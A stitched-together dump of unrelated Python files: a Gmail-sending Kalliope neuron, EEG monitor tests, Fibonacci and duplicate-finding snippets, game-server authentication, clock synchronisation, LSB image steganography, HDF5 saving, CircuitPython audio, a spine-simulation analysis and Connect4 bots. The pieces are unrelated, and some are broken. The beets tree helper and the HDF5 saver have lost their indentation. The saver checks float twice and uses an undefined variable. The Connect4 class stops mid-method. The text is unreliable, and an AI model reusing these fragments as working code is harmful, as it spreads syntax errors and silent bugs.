logging.basicConfig()
logger = logging.getLogger("kalliope")

# neuron class definition
class Mailsend(NeuronModule):
    """Kalliope neuron that sends an e-mail through Gmail's SMTP server.

    The mail is composed and sent as a side effect of construction, which
    is the calling convention Kalliope uses for neurons.

    Expected kwargs (from the synapse configuration):
      Fromadd -- sender address
      MDP     -- sender password
      Toadd   -- recipient address
      message -- mail body text
      subject -- mail subject
    """

    def __init__(self, **kwargs):
        super(Mailsend, self).__init__(**kwargs)
        # neuron parameters
        self.Fromadd = kwargs.get('Fromadd', None)  # sender address
        self.MDP = kwargs.get('MDP', None)          # password
        self.Toadd = kwargs.get('Toadd', None)      # recipient address
        self.message = kwargs.get('message', None)  # mail body
        self.subject = kwargs.get('subject', None)  # mail subject

        # build the MIME message
        message = MIMEMultipart()
        message['From'] = self.Fromadd
        message['To'] = self.Toadd
        message['Subject'] = self.subject
        # attach the body UTF-8 encoded so non-ASCII text survives transport
        msg = self.message
        message.attach(MIMEText(msg.encode('utf-8'), 'plain', 'utf-8'))

        # Send through Gmail's submission port with STARTTLS.
        # BUGFIX: quit() is now in a finally block so the connection is
        # always closed, even when login or sendmail raises.
        serveur = smtplib.SMTP('smtp.gmail.com', 587)
        try:
            serveur.starttls()
            serveur.login(self.Fromadd, self.MDP)
            texte = message.as_string().encode('utf-8')
            serveur.sendmail(self.Fromadd, self.Toadd, texte)
        finally:
            serveur.quit()
import time

# Examination start date as (day, month, year).
exam_st_date = (11, 12, 2014)

print("Retrieving date for examination ...")
time.sleep(1)  # simulate a lookup delay
# BUGFIX: corrected the user-facing typo "exmination" -> "examination"
print("The examination will start from :", exam_st_date[0], "/", exam_st_date[1], "/", exam_st_date[2])
from braindecode.datasets.pylearn import DenseDesignMatrixWrapper
from braindecode.datahandling.batch_iteration import WindowsIterator
from braindecode.veganlasagne.monitors import WindowMisclassMonitor,\
MonitorManager, CntTrialMisclassMonitor
import numpy as np
import theano.tensor as T
def test_window_misclass_monitor():
    """Check that WindowMisclassMonitor reports 1/3 misclass on a toy setup."""
    inputs = T.ftensor4()
    targets = T.ivector()
    # Three "class scores" derived from the per-trial input mean; the
    # constants are chosen so the argmax gives predictions 0, 1, 1 for
    # the three trials constructed below.
    preds = T.stack((-(T.mean(inputs, axis=(1,2,3)) - 3),
                     T.mean(inputs, axis=(1,2,3)) - 3,
                     0.0 * T.mean(inputs, axis=(1,2,3)))).T
    loss = T.mean(targets)  # some dummy stuff
    # should lead to predictions 0,1,1 which should lead to misclass 1/3.0
    topo_data = [range(i_trial, i_trial+6) for i_trial in range(3)]
    # shape into (batch, channel, samples, 1) as expected by the iterator
    topo_data = np.array(topo_data, dtype=np.float32)[:, np.newaxis, :, np.newaxis]
    y = np.int32(range(topo_data.shape[0]))  # labels 0, 1, 2
    dataset = DenseDesignMatrixWrapper(topo_view=topo_data, y=y,
                                       axes=('b', 'c', 0, 1))
    iterator = WindowsIterator(batch_size=7, n_samples_per_window=2,
                               sample_axes_name=0, n_sample_stride=1)
    monitor = WindowMisclassMonitor()
    monitor_manager = MonitorManager([monitor])
    monitor_manager.create_theano_functions(inputs, targets, preds, loss)
    monitor_chans = {'train_misclass': []}
    monitor_manager.monitor_epoch(monitor_chans, {'train': dataset}, iterator)
    # one of three trials is predicted wrongly -> misclass rate 1/3
    assert np.allclose([1/3.0], monitor_chans['train_misclass'])
def test_cnt_trial_misclass_monitor():
    """Check CntTrialMisclassMonitor in three scenarios, each expecting a
    misclass rate of 1/3 (one of three trials predicted wrongly)."""
    # --- Scenario 1: input_time_length=1, no padding ---------------------
    monitor_chans = dict(test_misclass=[])
    fake_set = lambda: None  # cheap stand-in object just to hang `.y` on
    # actually exact targets dont matter..
    # just creating 3 trials here in the y signal...
    fake_set.y = np.array([[0,0,0,0],[0,0,0,1],[0,0,0,1],[0,0,0,0],
                           [0,0,1,0],[0,0,1,0],[0,0,0,0],
                           [0,0,0,0],[1,0,0,0],[1,0,0,0],[0,0,0,0]])
    # first batch has two rows
    # second has one
    all_preds = np.array([
        np.array([[0,0.1,0.1,0.8], [0,0.1,0.1,0.8], [0,0.8,0.1,0.1],[0,0.8,0.1,0.1]]),
        np.array([[0.8,0.1,0.1,0.1],[0.8,0.1,0.1,0.1]])])
    all_targets = np.array([[[0,0,0,1], [0,0,0,1], [0,0,1,0],[0,0,1,0]],
                            [[1,0,0,0],[1,0,0,0]]])
    all_losses = None  # ignoring
    batch_sizes = [2,1]
    monitor = CntTrialMisclassMonitor(input_time_length=1)
    monitor.monitor_set(monitor_chans, 'test', all_preds, all_losses,
                        batch_sizes, all_targets, fake_set)
    assert np.allclose(1/3.0, monitor_chans['test_misclass'][-1])

    # --- Scenario 2: longer input time length and corresponding padding at start
    monitor_chans = dict(test_misclass=[])
    fake_set = lambda: None
    # actually exact targets dont matter..
    # just creating 3 trials here in the y signal...
    fake_set.y = np.array([[0,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0],
                           [0,0,0,1],[0,0,0,1],[0,0,0,0],
                           [0,0,1,0],[0,0,1,0],[0,0,0,0],
                           [0,0,0,0],[1,0,0,0],[1,0,0,0],[0,0,0,0]])
    # first batch has two rows
    # second has one
    all_preds = np.array([
        np.array([[0,0.1,0.1,0.8], [0,0.1,0.1,0.8], [0,0.8,0.1,0.1],[0,0.8,0.1,0.1]]),
        np.array([[0.8,0.1,0.1,0.1],[0.8,0.1,0.1,0.1]])])
    all_targets = np.array([[[0,0,0,1], [0,0,0,1], [0,0,1,0],[0,0,1,0]],
                            [[1,0,0,0],[1,0,0,0]]])
    all_losses = None  # ignoring
    batch_sizes = [2,1]
    monitor = CntTrialMisclassMonitor(input_time_length=3)
    monitor.monitor_set(monitor_chans, 'test', all_preds, all_losses,
                        batch_sizes, all_targets, fake_set)
    assert np.allclose(1/3.0, monitor_chans['test_misclass'][-1])

    # --- Scenario 3: predictions on empty (all-zero) targets are ignored -
    # Ignore the predictions on empty targets
    # expect it creates 3 outputs per length-2 trial
    fake_set = lambda: None
    # actually exact targets dont matter..
    # just creating 3 trials here in the y signal...
    fake_set.y = np.array([[0,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0],
                           [0,0,0,1],[0,0,0,1],[0,0,0,0],
                           [0,0,1,0],[0,0,1,0],[0,0,0,0],
                           [0,0,0,0],[1,0,0,0],[1,0,0,0],[0,0,0,0]])
    # the [-1,-1,-1,-1] rows pair with all-zero target rows and must be skipped
    all_preds = np.array([
        np.array([[-1,-1,-1,-1], [0,0.1,0.1,0.8], [0,0.1,0.1,0.8],
                  [-1,-1,-1,-1], [0,0.8,0.1,0.1],[0,0.8,0.1,0.1]]),
        np.array([[-1,-1,-1,-1],[0.8,0.1,0.1,0.1],[0.8,0.1,0.1,0.1]])])
    all_targets = np.array([[[0,0,0,0], [0,0,0,1], [0,0,0,1],
                             [0,0,0,0], [0,0,1,0],[0,0,1,0]],
                            [[0,0,0,0], [1,0,0,0],[1,0,0,0]]])
    all_losses = None  # ignoring
    batch_sizes = [2,1]
    monitor = CntTrialMisclassMonitor(input_time_length=3)
    monitor.monitor_set(monitor_chans, 'test', all_preds, all_losses,
                        batch_sizes, all_targets, fake_set)
    assert np.allclose(1/3.0, monitor_chans['test_misclass'][-1])
# -*- coding=utf-8 -*-
from xlhelper import ExcelReader, fields
import pprint

# Column descriptors mapping the Excel headers (Chinese) to record keys.
field_descs = (
    fields.Int(xl_name=u'加盟商ID', key='ops_org_id', required=True,
               nullable=False),
    fields.Str(xl_name=u'加盟商名称', key='org_name', required=True,
               nullable=False),
    fields.Float(xl_name=u'金额', key='amount', required=True,
                 nullable=False, as_decimal=True),
    fields.Str(xl_name=u'备注', key='remark', required=True,
               nullable=True, default='')
)

# NOTE(review): hard-coded absolute path to a local test workbook.
reader = ExcelReader(
    filename='/Users/henry/Desktop/线下申款测试数据-加盟商.xlsx')
try:
    rv = reader.parse_sheet_data(field_descs)
    pprint.pprint(rv)
except Exception as e:
    import traceback
    traceback.print_exc()
    # NOTE(review): drops into an interactive debugger on any failure —
    # a development aid, not suitable for unattended runs.
    import ipdb
    ipdb.set_trace()
|
def fib(n):
    """Return the n-th Fibonacci number with fib(0) = fib(1) = 1.

    Iterative implementation: the original double recursion is O(phi^n),
    which makes fib(30) noticeably slow; this runs in O(n) and returns
    the exact same values for n >= 0.
    """
    a, b = 1, 1
    for _ in range(n):
        a, b = b, a + b
    return a
# Print the first 31 Fibonacci numbers.
# FIX: the parenthesised print form is valid under both Python 2 and 3,
# whereas the original bare print statement is a SyntaxError on Python 3.
for i in range(31):
    print("the %s th term of the fibonacci sequence is %s" % (i, fib(i)))
|
class Solution(object):
    def findDuplicate(self, nums):
        """Return the duplicated value in `nums` (n+1 values in 1..n).

        Floyd's cycle detection on the sequence i -> nums[i]: the
        duplicate is the entrance of the cycle.  O(n) time, O(1) space,
        and the array is left unmodified.
        """
        # Phase 1: advance a slow and a fast pointer until they meet
        # somewhere inside the cycle.
        slow = nums[0]
        fast = nums[0]
        while True:
            slow = nums[slow]
            fast = nums[nums[fast]]
            if slow == fast:
                break
        # Phase 2: restart one pointer from the start; the next meeting
        # point is the cycle entrance, i.e. the duplicated number.
        slow = nums[0]
        while slow != fast:
            slow = nums[slow]
            fast = nums[fast]
        return fast
# Copyright 2010 Alon Zakai ('kripken'). All rights reserved.
# This file is part of Syntensity/the Intensity Engine, an open source project. See COPYING.txt for licensing.
"""
Handles authentication, both of the server instance to the master server,
and of clients to this server.
"""
from intensity.logging import *
class InstanceStatus:
    """Module-level status flags describing the state of this server instance."""

    ##! Standby mode means we need to be manually repurposed - we don't
    ##! automatically start a new map if the master update tells us that.
    ##! This is important after a server crash - don't want to immediately
    ##! restart the same map, it might be a crash on load, leading to a loop
    in_standby = False

    ##! A server is run in local mode when its address is 'localhost'
    ##! In this mode, an instance will only let a single client connect to it,
    ##! from the same machine. This is useful for editing (stuff like heightmaps etc.
    ##! only work in this mode, they are not available in multiplayer())
    local_mode = False

    ##! Private edit mode means that only a single client may connect to this instance
    ##! (which can then, like with local mode, use heightmaps etc.).
    private_edit_mode = False

    ##! Whether a map is currently loaded on this instance.
    map_loaded = False
def get_instance_id():
    """Return this instance's id from the config as a string ('' if unset)."""
    instance_id = get_config("Network", "instance_id", '')
    return str(instance_id)
def get_instance_validation():
    """Return this instance's validation token from the config as a string."""
    validation = get_config('Network', 'instance_validation', '')
    return str(validation)
def get_instance_address():
    """Return this instance's network address (defaults to 'localhost')."""
    address = get_config('Network', 'address', 'localhost')
    return str(address)
def check_local_mode():
    """Recompute and return whether this server runs in local mode.

    Local mode is defined as the configured address being 'localhost';
    the result is also stored on InstanceStatus.local_mode.
    """
    InstanceStatus.local_mode = get_instance_address() == 'localhost'
    return InstanceStatus.local_mode
## Contacts the master server with a status update about this server. The
## response tells us what map we should be running
def update_master(params={}, act=True):
    # NOTE(review): `params={}` is a mutable default argument; `update()`
    # below mutates it, so state can leak between calls. Left unchanged here.
    log(logging.DEBUG, "Updating master...")

    # Only contact the master when no location is forced in the local config.
    if get_config('Activity', 'force_location', '') == '':
        try:
            params.update({
                'version': INTENSITY_VERSION_STRING,
                'user_interface': get_instance_address() + ':' + str(get_config('Network', 'port', '28787')),
                'admin_interface': get_instance_address() + ':' + str(get_config('Network', 'admin_port', '28789')),
#                'instance_id': get_instance_id(),
                'activity_id': get_curr_activity_id(),
                'map_asset_id': get_curr_map_asset_id(),
                'validation': get_instance_validation(),
                'players': Clients.count(),
                'max_players': get_max_clients(),
            })
            response = contact_master("instance/update", params)
        except MasterNetworkError, e:
            log(logging.DEBUG, "Error in updating master: %s" % (str(e)))
            return  # No biggie, in general, hope to succeed next time...
    else:
        response = {}

    if 'instance_id' in response:
        set_config('Network', 'instance_id', response['instance_id'])
        # This update has been like a login - save our info
        get_master_session().set_info(response['instance_id'], response['session_id'])

    # Any force_* setting overrides whatever the master says.
    forced = get_config('Activity', 'force_activity_id', '') != '' or get_config('Activity', 'force_map_asset_id', '') != '' or get_config('Activity', 'force_location', '') != ''

    if InstanceStatus.in_standby:
        log(logging.WARNING, "In standby mode, not even considering loading a map")
        return

    # Load the forced map once, on the main action queue.
    if act and not InstanceStatus.map_loaded and forced:
        def do_set_map():
            set_map(get_config('Activity', 'force_activity_id', ''), get_config('Activity', 'force_map_asset_id', ''))
        main_actionqueue.add_action(do_set_map)

    # Otherwise follow the master's map assignment.
    if act and 'activity_id' in response and 'map_asset_id' in response and not forced:
        log(logging.DEBUG, "Master server requests us to change map")
        def do_set_map():
            set_map(response['activity_id'], response['map_asset_id'])
        main_actionqueue.add_action(do_set_map)
## Uploads an error log to the master, e.g., after a crash
def upload_error_log(error_log):
    """POST `error_log` to the master server; return True on success."""
    update_master(act=False)  # So we know our instance_id

    try:
        response = contact_master(
            "instance/uploadlog",
            {
                'instance_id': get_instance_id(),
                'error_log': error_log,
            },
            POST=True
        )
    except MasterNetworkError, e:
        print "Error in updating master: %s" % (str(e))
        return False

    return True
## @return False if failed, or a dictionary with 'username' and 'can_edit'
def check_login(code):
    # In local mode there is no master to verify against; accept the client.
    if check_local_mode(): return {};

    # The code is an OTP, used to identify and verify the client
    try:
        response = contact_master(
            "user/checklogin",
            {
                'instance_id': get_instance_id(),
                'code': code
            }
        )
    except MasterNetworkError, e:
        log(logging.ERROR, "Error in contacting master to check login: %s" % (str(e)))
        return False

    # The master replies success='1' when the OTP is valid.
    if response['success'] == '1':
        return response
    else:
        return False
# Prevent loops
from intensity.master import *
from intensity.server.persistence import *
from intensity.world import *
|
import socket
import datetime
from dateutil import parser
from timeit import default_timer as timer

# Cristian's-algorithm style client: fetch the current time from a clock
# server and compensate for half of the measured round-trip delay.
HOST = '127.0.0.1'
PORT = 8080

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))

t_request = timer()
server_time = parser.parse(sock.recv(1024).decode())
t_response = timer()
actual_time = datetime.datetime.now()

print("Clock server time: ", str(server_time))
delay = t_response - t_request
print("Process delay latency: ", str(delay))
print("Actual client time: ", str(actual_time))

# synchronizing client time with clock server:
# assume the one-way latency is half the round trip
client_time = server_time + datetime.timedelta(seconds=(delay / 2))
print("After synchronizing new client time: ", str(client_time))

error = actual_time - client_time
print("Synchronization error: ", str(error.total_seconds()), " seconds")
sock.close()
|
import numpy as np
def softmax(x):
    """Compute softmax values for x along axis 0 (column-wise).

    The scores are shifted by their column maximum before exponentiation;
    this leaves the result mathematically unchanged but prevents overflow
    in np.exp for large inputs.
    """
    z = np.exp(x - np.max(x, axis=0))
    return z / np.sum(z, axis=0)
# Scores for a single example (one value per class).
scores = [3.0, 1.0,0.2]
print(softmax(scores))

# Plot softmax curves
import matplotlib.pyplot as plt
# Sweep the first score from -2 to 6 while the other two stay fixed at
# 1.0 and 0.2; each column of `scores` is one point on the curves.
x = np.arange(-2.0, 6.0, 0.1)
scores = np.vstack([x, np.ones_like(x), 0.2 * np.ones_like(x)])

# plt.plot(x, softmax(scores).T, linewidth=2)
# plt.show()

# Show that the sum at each point is equal to one
# beside being aware of errors occuring by rounding of.
a = sum(softmax(scores))
print((a>0.999).all() & (a<=1.001).all())
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""A simple utility for constructing filesystem-like trees from beets
libraries.
"""
from collections import namedtuple
from beets import util
Node = namedtuple('Node', ['files', 'dirs'])
def _insert(node, path, itemid):
"""Insert an item into a virtual filesystem node."""
if len(path) == 1:
# Last component. Insert file.
node.files[path[0]] = itemid
else:
# In a directory.
dirname = path[0]
rest = path[1:]
if dirname not in node.dirs:
node.dirs[dirname] = Node({}, {})
_insert(node.dirs[dirname], rest, itemid)
def libtree(lib):
    """Generates a filesystem-like directory tree for the files
    contained in `lib`. Filesystem nodes are (files, dirs) named
    tuples in which both components are dictionaries. The first
    maps filenames to Item ids. The second maps directory names to
    child node tuples.
    """
    tree = Node({}, {})
    for item in lib.items():
        relpath = item.destination(fragment=True)
        _insert(tree, util.components(relpath), item.id)
    return tree
|
# For each of t test cases, print the product 3 * 4 * ... * 2n modulo
# 1e9+7, i.e. (2n)! with the factor 2 skipped ("div by 2 by skipping 2").
MOD = 1000000007

t = int(input())
for _ in range(t):
    n = int(input())
    result = 1
    for factor in range(3, 2 * n + 1):
        result = (result * factor) % MOD
    print(result)
|
#!/usr/bin/python
from bitstring import BitArray, BitStream
import hashlib
import Image
import sys
from util import getKey, getImageData
def getText(file):
    """Return the raw contents of `file` as bytes.

    BUGFIX: the original left the file handle open (relying on the garbage
    collector); a `with` block closes it deterministically.
    """
    with open(file, "rb") as fh:
        return fh.read()
def loadImage(input, output, text, key):
    """Embed `text` into the red-channel LSBs of image `input`, XORed with
    the bits of `key` (cycled), and save the result to `output`.

    Layout: the first 32 pixels carry a header with the payload bit length,
    the following pixels carry the payload bits, and all remaining pixels
    are copied through unchanged (alpha forced to 255 everywhere).
    """
    img = Image.open(input)
    # TODO - assert RGB/RGBA
    print img.mode
    #text = "Hello World!"
    bits = BitArray(bytes=text)
    # 32-bit header holding the payload length in bits
    lbits = BitArray(hex(bits.len))
    # pad the header out to 32 bits
    # (assumes BitArray.prepend of an int adds that many zero bits — verify)
    lbits.prepend(32 - lbits.len)
    print text
    print bits.bin
    print lbits.bin
#    print bits[1] & 1
    data = img.getdata()
#    print len(data)
    counter = 0
    newdata = []
    for i in data:
        c = counter - lbits.len   # index into the payload bits
        p = counter % len(key)    # key bit index (key is cycled)
        if (counter < lbits.len):
            # still writing the 32-bit length header
            q = (key[p] ^ (lbits[counter] & 1))
            newdata.append((i[0] ^ q,i[1],i[2],255))
        elif (c < bits.len):
            # writing payload bits
            q = (key[p] ^ (bits[c] & 1))
#            print "q:" + str(q) + " ,i:" + str(i[0]) + " ,i ^ q:" + str(i[0] ^ q)
            newdata.append((i[0] ^ q,i[1],i[2],255))
        else:
            # past the payload: copy the pixel unchanged
            newdata.append((i[0],i[1],i[2],255))
        counter += 1
#    for i in newdata:
#        print i
    img.putdata(newdata)
    img.save(output)
def main(argv):
    """CLI entry point: argv = [password, textfile, input image, output image]."""
    pw = argv[0]
    txtfile = argv[1]
    inputImage = argv[2]
    outputImage = argv[3]
    # derive the XOR key from the password and load the payload text
    key = getKey(pw)
    text = getText(txtfile)
    print "Input img: " + inputImage
    print "Output img: " + outputImage
    print "Text: " + text
    print "pass: " + pw
    print "Key: " + key.hex
    loadImage(inputImage,outputImage,text,key)

if __name__ == "__main__":
    main(sys.argv[1:])
|
import h5py
import numpy as np
def save_dict(elements, outputfile):
    """
    Save the ADAS data to an HDF5 file.
    """
    # the context manager guarantees the file is flushed and closed
    with h5py.File(outputfile, 'w') as hdf:
        _save_internal(elements, hdf)
def _save_internal(dct, f, path=''):
"""
Internal function for saving data to HDF5.
"""
for k in dct.keys():
if type(dct[k]) == dict:
o = f.create_group(k)
_save_internal(dct[k], o, path=path+'/'+k)
elif type(dct[k]) == float:
f.create_dataset(k, (1,), data=dct[k])
elif type(dct[k]) == int:
f.create_dataset(k, (1,), data=dct[k], dtype='i8')
elif type(dct[k]) == float:
v = 1 if dct[k] else 0
f.create_dataset(k, (1,), data=v, dtype='i4')
elif type(dct[k]) == str:
dset = f.create_dataset(k, (1,), dtype='S'+str(len(dct[k])))
dset[0:l] = np.string_(dct[k])
elif type(dct[k]) == list:
f.create_dataset(k, (len(dct[k]),), data=dct[k])
elif type(dct[k]) == np.ndarray:
f.create_dataset(k, dct[k].shape, data=dct[k])
else:
raise Exception("Unrecognized data type of entry '{}/{}': {}.".format(path, k, type(dct[k])))
|
# audio manipulation functions
from audiocore import RawSample
from audiopwmio import PWMAudioOut as AudioOut
class EAudio:
    """Audio playback helper for a CircuitPython board with a PWM speaker.

    NOTE(review): `board` and `digitalio` are used but not imported in this
    file's visible header — they must be provided by the surrounding module.
    """

    def __init__(self):
        import array
        self.audio = AudioOut(board.SPEAKER)
        self.SAMPLE_RATE = 8000
        # one second of 16-bit unsigned samples ("H" = unsigned short)
        self.sampleWave = array.array("H", [0] * self.SAMPLE_RATE)
        print(len(self.sampleWave))

    def enableSpeaker(self):
        """Drive the speaker-enable pin high so output is audible."""
        self.speaker_enable = digitalio.DigitalInOut(board.SPEAKER_ENABLE)
        self.speaker_enable.direction = digitalio.Direction.OUTPUT
        self.speaker_enable.value = True

    def genSineWave(self):
        """Fill the sample buffer with a 440 Hz sine wave (body currently disabled)."""
        import math
        FREQUENCY = 440  # 440 Hz middle 'A'
        #for i in range(self.SAMPLE_RATE):
        #    self.sampleWave[i] = int(math.sin(math.pi * 2 * i / 18) * (2 ** 15) + 2 ** 15)

    def playWave(self):
        """Play the sample buffer in a loop for one second, then stop."""
        import time  # BUGFIX: `time` was used without being imported anywhere visible
        self.audio.play(self.sampleWave, loop=True)
        time.sleep(1)
        self.audio.stop()

    def play_file(self, filename):
        """Play a WAV file through the speaker, blocking until finished.

        BUGFIX: the original method was missing `self`, referenced the
        undefined name `wave_file`, never imported WaveFile, and clobbered
        the sample buffer with the open file handle.
        """
        from audiocore import WaveFile  # module is imported by this file's header
        print("Playing file: " + filename)
        with open(filename, "rb") as wave_data:
            with WaveFile(wave_data) as wave:
                with AudioOut(board.SPEAKER) as audio:
                    audio.play(wave)
                    while audio.playing:
                        pass
        print("Finished")
|
import numpy as np
import h5py
import os
import pickle
# Target species whose particle counts are summed per spine.
Targs = ['N0C0_CN', 'N0C1_CN', 'N0C2_CN', 'N1C0_CN', 'N1C1_CN', 'N1C2_CN',\
    'N2C0_CN','N2C1_CN','N2C2_CN']
#Targs = ['Ca']
print('Targs[0]: ', Targs[0])

input_lm_folder = 'lms'
# Input LM result files in chronological order: the pre-run first, then
# the numbered stimulation runs.
# FIX: removed a dead two-element assignment to input_lm_files that was
# immediately overwritten by this list in the original.
input_lm_files = ['_prerun_result.lm',\
    '_stimrun_00.lm',\
    '_stimrun_01.lm',\
    '_stimrun_02.lm',\
    '_stimrun_03.lm',\
    '_stimrun_04.lm',\
    '_stimrun_05.lm',\
    '_stimrun_06.lm',\
    '_stimrun_07.lm',\
    '_stimrun_08.lm',\
    '_stimrun_09.lm',\
    '_stimrun_10.lm',\
    '_stimrun_11.lm',\
    '_stimrun_12.lm',\
    '_stimrun_13.lm',\
    '_stimrun_14.lm',\
    '_stimrun_15.lm',\
    '_stimrun_16.lm',\
    '_stimrun_17.lm',\
    '_stimrun_18.lm',\
    '_stimrun_19.lm',\
    '_stimrun_20.lm',\
    '_stimrun_21.lm',\
    '_stimrun_22.lm',\
    '_stimrun_23.lm',\
    '_stimrun_24.lm',\
    '_stimrun_25.lm']

input_label_file = "lm_annot/labels.hdf5"
output_figfile_prefix = "Stim_Spine_"
output_figfile_dir = 'figs'
## Offscreen rendering
# mlab.options.offscreen = True

## Decode molecular names and volume
cyt = 1        # lattice-site type id treated as cytosol
NA = 6.022e23  # Avogadro's number

# Read lattice geometry from the first LM file to get the cytosolic volume.
f = h5py.File( input_lm_folder + os.sep + input_lm_files[0],'r')
data = f['Model']['Diffusion']['LatticeSites'][()]
num_voxels = np.count_nonzero(data == cyt)
Spacing = f['Model']['Diffusion'].attrs['latticeSpacing']
# voxel volume in m^3, converted to litres (x1000)
volume_in_L = num_voxels * Spacing * Spacing * Spacing * 1000

## Decode molecular names: map species name -> 1-based particle id
mnames = f['Parameters'].attrs['speciesNames'].decode().split(',')
S = {}
for i in range(len(mnames)):
    S[mnames[i]] = i+1
f.close()
## Load spine labels
with h5py.File(input_label_file, 'r') as f:
    labels = f['dendrite'][()]
ids_spine, nums_spine_voxels = np.unique(labels, return_counts=True)
# drop the first (background) id and the last two label ids
ids_spine = ids_spine[1:-2]
nums_spine_voxels = nums_spine_voxels[1:-2]
# ids_spine = ids_spine[::4]
# nums_spine_voxels = nums_spine_voxels[::4]
vols_spine_in_L = nums_spine_voxels * Spacing * Spacing * Spacing * 1000
print('ids_spine: ', ids_spine)

# Pad the label volume up to multiples of the minimum lattice size.
_labels = labels
nx, ny, nz = _labels.shape
min_lattice_size = 32
# BUGFIX: np.int was deprecated in NumPy 1.20 and removed in 1.24;
# use the builtin int instead.
lx = int(np.ceil(1.0 * nx / min_lattice_size) * min_lattice_size)
ly = int(np.ceil(1.0 * ny / min_lattice_size) * min_lattice_size)
lz = int(np.ceil(1.0 * nz / min_lattice_size) * min_lattice_size)
labels = np.zeros((lx, ly, lz), dtype=int)
labels[:nx, :ny, :nz] = _labels
labels = labels.flatten()

# Per-spine display colors from the annotation pickle.
with open('lm_annot/list.pickle', 'rb') as f:
    spine_info = pickle.load(f)  # renamed from `list`, which shadowed the builtin
cols = []
for id_spine in ids_spine:
    c = [x for x in spine_info['list'] if x['id'] == id_spine]
    r = c[0]['r'] / 256.0
    g = c[0]['g'] / 256.0
    b = c[0]['b'] / 256.0
    cols.append((r, g, b))
## Obtain timepoints
Timepoints = [0]
for i, lmfile in enumerate(input_lm_files):
    filename = input_lm_folder + os.sep + lmfile
    #print('file :', filename)
    # BUGFIX: the original wrote `hfile.close` (without parentheses), which
    # never closed the file; a context manager closes it reliably.
    with h5py.File(filename, 'r') as hfile:
        tmp = hfile['Simulations']['0000001']['LatticeTimes'][()]
    # each run's timeline continues from the previous run's end time
    tmp = tmp + Timepoints[-1]
    tmp = tmp.tolist()
    Timepoints.extend(tmp[1:])
Timepoints = Timepoints[1:]
# print('Timepoints: ',Timepoints)
## Obtain molecular counts of spines at each timepoint
num_molecules_spine = []
for i, lmfile in enumerate(input_lm_files):
    filename = input_lm_folder + os.sep + lmfile
    print('file :', filename)
    # BUGFIX: `hfile.close` (no parentheses) never closed the files;
    # the context manager guarantees each one is closed.
    with h5py.File(filename, 'r') as hfile:
        Frames = [key for key in hfile['Simulations']['0000001']['Lattice'].keys()]
        Frames.sort()
        Frames.pop(0)  # skip the initial frame
        for f in Frames:
            particles = hfile['Simulations']['0000001']['Lattice'][f][:, :, :, :]
            num_molecules_spine_time_i = []
            for id_spine in ids_spine:
                tmp_num = 0
                # voxel mask of this spine (labels is flattened)
                targ_spine_label = (labels == id_spine)
                # count particles of the target species within the spine
                for j in range(particles.shape[3]):
                    p = particles[:, :, :, j].flatten()
                    pp = p[targ_spine_label]
                    for Targ in Targs:
                        tmp_num += np.count_nonzero(pp == S[Targ])
                num_molecules_spine_time_i.append(tmp_num)
            print('num_molecules_spine_time_i: ', num_molecules_spine_time_i)
            num_molecules_spine.append(num_molecules_spine_time_i)

num_molecules_spine = np.array(num_molecules_spine)
print()
# convert counts to concentrations (uM) via Avogadro's number and spine volumes
uMs = num_molecules_spine / NA * 1e6 / vols_spine_in_L
toffset = 20  # time offset (s); plotted time is relative to this point
t = np.array(Timepoints[:])-toffset
np.savez('num_molecules_spine_'+Targs[0]+'.npz', t=t, num_molecules_spine=num_molecules_spine)
# tmp = np.load('num_molecules_spine.npz')
# num_molecules_spine = tmp['num_molecules_spine']

import matplotlib.pyplot as plt
fig = plt.figure(figsize=(6,4))
ax=fig.add_subplot(111)
#for i, id_spine in enumerate(ids_spine):
#    ax.plot(Timepoints, num_molecules_spine[:,i], label=str(id_spine), color=cols[i] )
# one trace per spine, with a random color per trace
for i, id_spine in enumerate(ids_spine):
    ax.plot(t, uMs[:,i], label=str(id_spine), color=np.random.rand(3,) )
ax.set_position([0.2,0.2,0.7,0.6])
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.set_xlim([-2.5,12.5])
# NOTE(review): `Targ` here is the leftover loop variable (the LAST entry
# of Targs), while the filenames below use Targs[0] — confirm which title
# is intended.
plt.title(Targ)
plt.xlabel('Time (s)')
plt.ylabel('Conc (uM)')
#plt.ylabel('Number')
hans, labs = ax.get_legend_handles_labels()
ax.legend(handles=hans,labels=labs, frameon=False)
plt.savefig(output_figfile_dir+'/'+ output_figfile_prefix + Targs[0] + '.pdf')
plt.savefig(output_figfile_dir+'/'+ output_figfile_prefix + Targs[0] + '.png',dpi=150)
plt.show()
|
# Name: David Adams
# CMS cluster login name: dmadams
'''
final_players.py
This module contains code for various bots that play Connect4 at varying
degrees of sophistication.
'''
import random
from Connect4Simulator import *
class RandomPlayer:
    '''
    This player makes one of the possible moves on the game board,
    chosen at random.
    '''

    def chooseMove(self, board, player):
        '''
        Given the current board and player number, choose and return a move.

        Arguments:
          board  -- a Connect4Board instance
          player -- either 1 or 2

        Precondition: There must be at least one legal move.
        Invariant: The board state does not change.
        '''
        assert player in [1, 2]
        moves = board.possibleMoves()
        assert moves != []
        return random.choice(moves)
class SimplePlayer:
    '''
    This player will always play a move that gives it a win if there is one.
    Otherwise, it picks a random legal move.
    '''

    def chooseMove(self, board, player):
        '''
        Given the current board and player number, choose and return a move.

        Arguments:
          board  -- a Connect4Board instance
          player -- either 1 or 2

        Precondition: There must be at least one legal move.
        Invariant: The board state does not change.
        '''
        assert player in [1, 2]
        moves = board.possibleMoves()
        # take the first immediately winning move, if any exists
        winning = [c for c in moves if board.isWinningMove(c, player)]
        if winning:
            return winning[0]
        return random.choice(moves)
class BetterPlayer:
    '''
    This player will always play a move that gives it a win if there is one.
    Otherwise, it tries all moves, collects all the moves which don't allow
    the other player to win immediately, and picks one of those at random.
    If there is no such move, it picks a random move.
    '''

    def chooseMove(self, board, player):
        '''
        Given the current board and player number, choose and return a move.

        Arguments:
          board  -- a Connect4Board instance
          player -- either 1 or 2

        Precondition: There must be at least one legal move.
        Invariant: The board state does not change.
        '''
        assert player in [1, 2]
        moves = board.possibleMoves()
